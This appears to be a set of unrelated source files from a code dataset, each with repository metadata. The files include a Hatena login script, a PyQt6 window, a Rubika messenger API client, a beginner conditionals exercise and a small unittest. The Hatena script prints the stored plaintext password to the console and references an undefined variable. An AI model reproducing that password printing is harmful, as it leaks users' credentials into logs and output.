main.py
ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
main.py
ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
#!python3 #encoding:utf-8 from urllib.request import build_opener, HTTPCookieProcessor from urllib.parse import urlencode from http.cookiejar import CookieJar import pprint import dataset class HatenaSite(object): def __init__(self, path_hatena_accounts_sqlite3): self.path_hatena_accounts_sqlite3 = path_hatena_accounts_sqlite3 self.db_accounts = dataset.connect('sqlite:///' + path_hatena_accounts_sqlite3) def login(self, hatena_id): account = self.db_accounts['Accounts'].find_one(HatenaId=hatena_id) if (None == account): print('{0} のはてなIDを持ったアカウント情報は次のDBに存在しません。: {1}'.format(hatena, self.path_hatena_accounts_sqlite3)) return print(account['Password']) opener = build_opener(HTTPCookieProcessor(CookieJar())) post = { 'name': hatena_id, 'password': account['Password'] } data = urlencode(post).encode('utf-8') res = opener.open('https://www.hatena.ne.jp/login', data) pprint.pprint(res.getheaders()) res.close() url = 'http://f.hatena.ne.jp/{0}/{1}/rss'.format(hatena_id, 'Hatena Blog') res = opener.open(url) with open('photo_life.xml', 'wb') as f: f.write(res.read()) res.close() if __name__ == '__main__': hatena_id = 'ytyaru' client = HatenaSite( path_hatena_accounts_sqlite3 = "meta_Hatena.Accounts.sqlite3" ) client.login(hatena_id)
33.088889
110
0.646071
173
1,489
5.312139
0.421965
0.106638
0.159956
0.163221
0.126224
0
0
0
0
0
0
0.012195
0.229013
1,489
44
111
33.840909
0.788328
0.014775
0
0.057143
0
0
0.151639
0.040301
0
0
0
0
0
1
0.057143
false
0.057143
0.142857
0
0.257143
0.114286
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
0511c5e889756be6d1498e4e5630fe4522e1af10
176
py
Python
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
1
2021-09-20T21:48:11.000Z
2021-09-20T21:48:11.000Z
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
null
null
null
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
null
null
null
from PyQt6.QtWidgets import QApplication, QWidget import sys # komentarz app = QApplication(sys.argv) # ([]) -bez argumentów window = QWidget() window.show() app.exec()
14.666667
52
0.715909
21
176
6
0.714286
0
0
0
0
0
0
0
0
0
0
0.006757
0.159091
176
11
53
16
0.844595
0.170455
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
051e064cf78fe1b3efaa1e563322f576984f94e9
24,624
py
Python
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
23
2021-12-06T09:54:01.000Z
2022-03-31T19:44:29.000Z
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
4
2022-01-08T19:27:40.000Z
2022-03-30T13:18:23.000Z
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
13
2021-12-08T14:18:39.000Z
2022-03-30T13:20:37.000Z
from pathlib import Path from requests import post from random import randint from json import loads, dumps import random, datetime, rubika.encryption # because should be exist ! adminsAccess = { "pin":"PinMessages", "newAdmin":"SetAdmin", "editInfo":"ChangeInfo", "banMember":"BanMember", "changeLink":"SetJoinLink", "changeMembersAccess":"SetMemberAccess", "deleteMessages":"DeleteGlobalAllMessages" } usersAccess = { "addMember":"AddMember", "viewAdmins":"ViewAdmins", "viewMembers":"ViewMembers", "sendMessage":"SendMessages" } class Bot: def __init__(self, auth): self.auth = auth self.enc = rubika.encryption.encryption(auth) @staticmethod def _getURL(): return "https://messengerg2c64.iranlms.ir/" ''' result = [] for i in range(11,99): result.append(f"https://messengerg2c{i}.iranlms.ir/") return random.choice(result) ''' def _requestSendFile(self, file): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"requestSendFile", "input":{ "file_name": str(file.split("/")[-1]), "mime": file.split(".")[-1], "size": Path(file).stat().st_size }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json()["data_enc"]))["data"] def _uploadFile(self, file): frequest = Bot._requestSendFile(self, file) bytef = open(file,"rb").read() hash_send = frequest["access_hash_send"] file_id = frequest["id"] url = frequest["upload_url"] header = { 'auth':self.auth, 'Host':url.replace("https://","").replace("/UploadFile.ashx",""), 'chunk-size':str(Path(file).stat().st_size), 'file-id':str(file_id), 'access-hash-send':hash_send, "content-type": "application/octet-stream", "content-length": str(Path(file).stat().st_size), "accept-encoding": "gzip", "user-agent": "okhttp/3.12.1" } if len(bytef) <= 131072: header["part-number"], header["total-part"] = "1","1" while True: try: j = post(data=bytef,url=url,headers=header).text j = 
loads(j)['data']['access_hash_rec'] break except Exception as e: continue return [frequest, j] else: t = random._floor(len(bytef) / 131072 + 1) for i in range(1,t+1): if i != t: k = i - 1 k = k * 131072 while True: try: header["chunk-size"], header["part-number"], header["total-part"] = "131072", str(i),str(t) o = post(data=bytef[k:k + 131072],url=url,headers=header).text o = loads(o)['data'] break except Exception as e: continue else: k = i - 1 k = k * 131072 while True: try: header["chunk-size"], header["part-number"], header["total-part"] = str(len(bytef[k:])), str(i),str(t) p = post(data=bytef[k:],url=url,headers=header).text p = loads(p)['data']['access_hash_rec'] break except Exception as e: continue return [frequest, p] def sendMessage(self, chat_id, text, metadata=[], message_id=None): inData = { "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if metadata != [] : inData["input"]["metadata"] = {"meta_data_parts":metadata} return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))},url=Bot._getURL()) def editMessage(self, message_id, chat_id, newText): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"editMessage", "input":{ "message_id": message_id, "object_guid": chat_id, "text": newText }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def deleteMessages(self, chat_id, message_ids): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"deleteMessages", "input":{ "object_guid":chat_id, "message_ids":message_ids, "type":"Global" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", 
"package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def getUserInfo(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getUserInfo", "input":{ "user_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json()["data_enc"])) def getMessages(self, chat_id,min_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesInterval", "input":{ "object_guid":chat_id, "middle_message_id":min_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("messages") def getInfoByUsername(self, username): ''' username should be without @ ''' return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getObjectByUsername", "input":{ "username":username }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))) def banGroupMember(self, chat_id, user_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"banGroupMember", "input":{ "group_guid": chat_id, "member_guid": user_id, "action":"Set" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def invite(self, chat_id, user_ids): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"addGroupMembers", "input":{ "group_guid": chat_id, "member_guids": user_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", 
"lang_code":"fa" } }))},url=Bot._getURL()) def getGroupAdmins(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "client":{ "app_name":"Main", "app_version":"2.9.5", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "input":{ "group_guid":chat_id }, "method":"getGroupAdminMembers" }))},url=Bot._getURL()).json().get("data_enc"))) def getMessagesInfo(self, chat_id, message_ids): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesByID", "input":{ "object_guid": chat_id, "message_ids": message_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url=Bot._getURL()).json()["data_enc"])).get("data").get("messages") def setMembersAccess(self, chat_id, access_list): return post(json={ "api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "access_list": access_list, "group_guid": chat_id })), "method": "setGroupDefaultAccess" }, url=Bot._getURL()) def getGroupMembers(self, chat_id): return loads(self.enc.decrypt(post(json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupAllMembers", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } })) }, url=Bot._getURL()).json()["data_enc"]))["data"]["in_chat_members"] def getGroupInfo(self, chat_id): return loads(self.enc.decrypt(post( json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupInfo", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", 
"lang_code":"fa" } }))}, url=Bot._getURL()).json()["data_enc"])) def getGroupLink(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getGroupLink", "input":{ "group_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("join_link") def changeGroupLink(self, chat_id): return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "data_enc":self.enc.encrypt(dumps({ "group_guid": chat_id })), "method":"setGroupLink", },url=Bot._getURL()) def setGroupTimer(self, chat_id, time): return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "group_guid": chat_id, "slow_mode": time, "updated_parameters":["slow_mode"] })), "method":"editGroupInfo" },url=Bot._getURL()) def setGroupAdmin(self, chat_id, user_id, access_list=[]): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setGroupAdmin", "input":{ "group_guid": chat_id, "access_list": access_list, "action": "SetAdmin", "member_guid": user_id }, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" } }))},url=Bot._getURL()) def deleteGroupAdmin(self, chat_id, user_id, access_list=[]): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setGroupAdmin", "input":{ "group_guid": chat_id, "action": "UnsetAdmin", "member_guid": user_id }, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" } 
}))},url=Bot._getURL()) def logout(self): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"logout", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def forwardMessages(self, From, message_ids, to): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"forwardMessages", "input":{ "from_object_guid": From, "message_ids": message_ids, "rnd": f"{randint(100000,999999999)}", "to_object_guid": to }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def seenChats(self, seenList): # seenList should be a dict , keys are object guids and values are last message’s id, {"guid":"msg_id"} return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"seenChats", "input":{ "seen_list": seenList }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def sendChatAction(self, chat_id, action): #every some seconds before sending message this request should send return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendChatActivity", "input":{ "activity": action, "object_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def pin(self, chat_id, message_id): return post(json={"api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "action":"Pin", "message_id": message_id, "object_guid": chat_id })), "method": "setPinMessage" },url=Bot._getURL()) def unpin(self, chat_id, 
message_id): return post(json={"api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "action":"Unpin", "message_id": message_id, "object_guid": chat_id })), "method": "setPinMessage" },url=Bot._getURL()) def joinGroup(self, link): hashLink = link.split("/")[-1] return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"joinGroup", "input":{ "hash_link": hashLink }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def leaveGroup(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"leaveGroup", "input":{ "group_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def block(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setBlockUser", "input":{ "action": "Block", "user_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def unblock(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setBlockUser", "input":{ "action": "Unblock", "user_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def sendPhoto(self, chat_id, file, size, thumbnail=None, caption=None, message_id=None): uresponse = Bot._uploadFile(self, file) file_inline = { "dc_id": uresponse[0]["dc_id"], "file_id": uresponse[0]["id"], "type":"Image", "file_name": file.split("/")[-1], "size": str(Path(file).stat().st_size), 
"mime": file.split(".")[-1], "access_hash_rec": uresponse[1], "width": size[0], "height": size[1], "thumb_inline": thumbnail or "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" } inData = { "method":"sendMessage", "input":{ "file_inline": file_inline, "object_guid": chat_id, "rnd": f"{randint(100000,999999999)}", "reply_to_message_id": message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = {"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))} return post(json=data,url=Bot._getURL()) def sendVoice(self, chat_id, file, time, caption=None, message_id=None): # file's format should be ogg. time should be ms (type: float). uresponse = Bot._uploadFile(self, file) inData = { "method":"sendMessage", "input":{ "file_inline": { "dc_id": uresponse[0]["dc_id"], "file_id": uresponse[0]["id"], "type":"Voice", "file_name": file.split("/")[-1], "size": str(Path(file).stat().st_size), "time": time, "mime": file.split(".")[-1], "access_hash_rec": uresponse[1], }, "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = { "api_version":"5", "auth":self.auth, "data_enc":self.enc.encrypt(dumps(inData)) } return post(json=data,url=Bot._getURL()) def sendDocument(self, chat_id, file, caption=None, message_id=None): # Bot.sendDocument("guid","./file.txt", caption="anything", message_id="12345678") uresponse = Bot._uploadFile(self, file) file_id = str(uresponse[0]["id"]) mime = file.split(".")[-1] dc_id = uresponse[0]["dc_id"] access_hash_rec = uresponse[1] file_name = file.split("/")[-1] size = str(Path(file).stat().st_size) inData = { "method":"sendMessage", "input":{ "object_guid":chat_id, "reply_to_message_id":message_id, 
"rnd":f"{randint(100000,999999999)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = { "api_version":"5", "auth":self.auth, "data_enc":self.enc.encrypt(dumps(inData)) } while True: try: return loads(self.enc.decrypt(loads(post(json=data,url=Bot._getURL()).text)['data_enc'])) break except: continue def sendLocation(self, chat_id, location, message_id=None): # location = [float(x), float(y)] return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "is_mute": False, "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "location":{ "latitude": location[0], "longitude": location[1] }, "reply_to_message_id":message_id })), "method":"sendMessage" },url=Bot._getURL()) def searchInChannelMembers(self, text, channel_guid): try: return loads(self.enc.decrypt(post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "channel_guid": channel_guid, "search_text": text })), "method":"getChannelAllMembers" },url=Bot._getURL()).json()["data_enc"]))["in_chat_members"] except KeyError: return None def getChatsUpdate(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getChatsUpdates", "input":{ "state":time_stamp, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", 
"lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("chats") def getChatUpdate(self, chat_id): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesUpdates", "input":{ "object_guid":chat_id, "state":time_stamp }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("updated_messages") def myStickerSet(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMyStickerSets", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data") class Socket: data = {"error":[],"messages":[]} def __init__(self, auth): self.auth = auth self.enc = rubika.encryption.encryption(auth) def on_open(self, ws): def handShake(*args): ws.send(dumps({ "api_version": "4", "auth": self.auth, "data_enc": "", "method": "handShake" })) import _thread _thread.start_new_thread(handShake, ()) def on_error(self, ws, error): Socket.data["error"].append(error) def on_message(self, ws, message): try: parsedMessage = loads(message) Socket.data["messages"].append({"type": parsedMessage["type"], "data": loads(self.enc.decrypt(parsedMessage["data_enc"]))}) except KeyError: pass def on_close(self, ws, code, msg): return {"code": code, "message": msg} def handle(self, OnOpen=None, OnError=None, OnMessage=None, OnClose=None, forEver=True): import websocket ws = websocket.WebSocketApp( "wss://jsocket3.iranlms.ir:80", on_open=OnOpen or Socket(self.auth).on_open, on_message=OnMessage or Socket(self.auth).on_message, 
on_error=OnError or Socket(self.auth).on_error, on_close=OnClose or Socket(self.auth).on_close ) if forEver : ws.run_forever()
29.349225
2,034
0.634665
2,970
24,624
5.091582
0.123906
0.022219
0.032535
0.034255
0.601971
0.571816
0.53895
0.535181
0.524732
0.507406
0
0.03091
0.163093
24,624
839
2,035
29.349225
0.702882
0.016244
0
0.613666
0
0.001314
0.368978
0.093771
0
1
0
0
0
1
0.061761
false
0.001314
0.009198
0.036794
0.128778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
2
051f4dab5a5f1bed25333ea9cb6d58c8c48a834b
424
py
Python
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
null
null
null
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
17
2019-12-01T16:56:29.000Z
2022-03-02T04:49:51.000Z
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
1
2019-09-28T00:43:54.000Z
2019-09-28T00:43:54.000Z
people = 30 cars = 40 buses = 15 if cars > people: print "We should take the cars." elif cars < people: print "we should not take the cars." else: print "we can't decide." if buses > cars: print " That's too many buses" elif buses < cars: print " Maybe we could take the bus." else: print "we stil can't decide." if people > buses: print " Alright lets take the buses." else: print "Fine, let's stay home then."
17.666667
38
0.676887
74
424
3.878378
0.445946
0.097561
0.10453
0.118467
0.160279
0
0
0
0
0
0
0.018127
0.21934
424
23
39
18.434783
0.848943
0
0
0.157895
0
0
0.463357
0
0
0
0
0
0
0
null
null
0
0
null
null
0.421053
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
05260b29fa65b53dc965a1c89ebcef95a1a96d54
396
py
Python
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
"""Test config_generator.py module""" from unittest import TestCase from projector_installer.config_generator import token_quote class ConfigGeneratorTest(TestCase): """Test config_generator.py module""" def test_token_quote(self) -> None: """The token_quote method must return the same token in quotes""" self.assertEqual(token_quote('some_token'), '\"some_token\"')
30.461538
73
0.739899
50
396
5.64
0.54
0.141844
0.134752
0.148936
0.191489
0
0
0
0
0
0
0
0.151515
396
12
74
33
0.839286
0.310606
0
0
0
0
0.093385
0
0
0
0
0
0.2
1
0.2
false
0
0.4
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
053268be449fba403f273951c902bae23a8253b1
333
py
Python
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
1
2021-08-18T05:58:17.000Z
2021-08-18T05:58:17.000Z
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
3
2015-11-17T21:01:03.000Z
2016-07-14T09:08:04.000Z
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
5
2015-07-02T13:29:23.000Z
2021-09-25T07:48:30.000Z
